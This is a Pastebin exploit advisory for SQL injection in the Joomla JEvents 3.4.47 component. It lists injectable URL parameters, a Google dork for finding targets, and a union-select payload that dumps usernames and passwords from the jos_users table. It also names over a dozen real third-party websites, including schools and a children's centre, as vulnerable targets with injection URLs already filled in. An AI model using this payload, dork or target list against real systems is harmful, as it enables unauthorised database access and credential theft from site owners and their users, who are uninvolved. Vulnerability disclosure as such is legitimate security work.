Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JEvents Components 3.4.47 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : jevents.net
- # Software Download Link : jevents.net/download-area/jevents
- # Software Information Link : extensions.joomla.org/extension/jevents/
- # Software Version : 3.4.47
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jevents''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010306
- packetstormsecurity.com/files/151429/Joomla-JEvents-3.4.47-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- JEvents is a well known and Loved Events Calendar / Management solution for Joomla.
- JEvents provides a full events and calendar solution for your Joomla! site.
- Showing your events in listings or as a visual monthly calendar view, create complex
- repeats patterns, import and export your events with a couple of clicks, offer a feed
- with your latest events. The JEvents calendar is translated into more than 40 languages
- so we are likely to have a translation for your website. JEvents offer Complex repeating
- event patterns, repeating event exceptions, importing and exporting of calendars,
- a sophisticated layout editor for event detail, event calendar, upcoming event list
- and even event creation pages.
- ####################################################################
- # Impact :
- **********
- The JEvents 3.4.47 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- A successful exploit may allow an attacker to compromise the application, access
- or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jevents&Itemid=[SQL Injection]
- /index.php?option=com_jevents&task=month.calendar&Itemid=[SQL Injection]
- /index.php?option=com_jevents&task=modlatest.rss&format=
- feed&type=rss&Itemid=0&modid=[SQL Injection]
- /index.php?option=com_jevents&task=month.calendar&year=
- [YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=[SQL Injection]
- /index.php?option=com_jevents&task=year.listevents&day=
- [DAY]&month=[MONTH]&year=[YEAR]&Itemid=0
- /index.php?option=com_jevents&task=month.calendar&Itemid=
- [ID-NUMBER]&year=[YEAR]&month=[MONTH]&day=[DAY][SQL Injection]
- /index.php?option=com_jevents&task=icalrepeat.detail&evid=
- [ID-NUMBER]&Itemid=[ID-NUMBER]&year=[YEAR]&month=
- [MONTH]&day=[DAY][SQL Injection]
- /index.php?option=com_jevents&task=cat.listevents&year=
- [YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&pop=
- [ID-NUMBER]&tmpl=component&limitstart=[SQL Injection]
- /component/jevents/day.listevents/[YEAR]/[MONTH]/[DAY]
- /index.php?option=com_jevents&task=month.calendar&catids=
- [ID-NUMBER]&month=[MONTH]&year=[YEAR]&Itemid=[SQL Injection]
- # Example Exploit Payload :
- ************************
- union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] thurstancollege.net/index.php?option=com_jevents&Itemid=1%27
- [+] priorsfordprimary.com/Joomla/index.php?option=com_jevents&task=
- modlatest.rss&format=feed&type=rss&Itemid=0&modid=0%27
- [+] hortonwine.com/index.php?option=com_jevents&task=
- month.calendar&year=1948&month=02&day=01&Itemid=0&pop=1%27
- [+] pohodart.cz/index.php?option=com_jevents&task=
- year.listevents&day=27&month=02&year=2019&Itemid=0
- [+] allureparrucchieri.it/index.php?option=com_jevents&task=
- month.calendar&year=2018&month=07&day=22&Itemid=68&pop=1%27
- [+] chlcourse.com/software/index.php?option=com_jevents&task=
- month.calendar&year=2019&month=04&day=19&Itemid=0&pop=1%27
- [+] horizonschildrenscentre.ca/index.php?option=com_jevents&task=
- month.calendar&Itemid=0&year=2011&month=04&day=25
- [+] spider.awardspace.info/index.php?option=com_jevents&task=
- month.calendar&Itemid=18
- [+] shannondelany.com/joomla/index.php?option=com_jevents&task=
- icalrepeat.detail&evid=12&Itemid=75&year=2011&month=08&day=27%27
- [+] arpege.musicanet.org/component/jevents/day.listevents/2018/08/11
- /index.php?option=com_jevents&task=month.calendar&catids=
- 62&month=02&year=2021&Itemid=0
- [+] neu.oaseczk.de/index.php?option=com_jevents&task=
- cat.listevents&year=2018&month=07&day=24&Itemid=
- 168&pop=1&tmpl=component&limitstart=150
- [+] s437716437.onlinehome.us/index.php?option=com_jevents
- &task=modlatest.rss&format=feed&type=atom&Itemid=101&modid=0
- [+] 2injoy.com/index.php?option=com_jevents&view=cat&layout=listevents&Itemid=144
- [+] sportverein-beuren.de/index.php?option=com_jevents
- &task=year.listevents&Itemid=72&year=2012&month=03&day=02
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Only variables should be assigned by reference in
- /home/priosfor/public_html/Joomla/plugins/system/k2/k2.php on line 278
- Deprecated: Assigning the return value of new by reference is deprecated in
- /home/hortonwi/public_html/components/com_jevents/libraries/helper.php on line 119
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment